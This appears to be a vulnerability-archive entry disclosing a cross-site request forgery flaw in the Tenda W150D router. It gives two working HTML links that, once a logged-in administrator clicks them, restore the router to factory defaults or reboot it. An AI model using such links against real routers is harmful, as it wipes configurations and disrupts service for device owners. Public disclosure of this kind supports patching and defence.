Tenda W150D Cross Site Request Forgery

2015.01.13

Credit: Hadji Samir

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-352

# Exploit Title: Tenda W150D Router - CSRF Vulnerability
# Date: 2015-01-10
# Exploit Author: Hadji Samir s-dz@hotmail.fr
# Vendor Homepage: http://tenda.com.cn/
# Software Link: http://tenda.cn/tendacn/Product/show.aspx?productid=389
# Version: 1.0.0
# Thanks: Hamama Alzir (fb)
When the administrator login, click on the link below " restore default the Router"
<a href="http://192.168.1.1/restoreinfo.cgi">restore default</a>
When the administrator login, click on the link below " the device will reboot"
<a href="http://192.168.1.1/rebootinfo.cgi">reboot</a>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Tenda W150D Cross Site Request Forgery

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.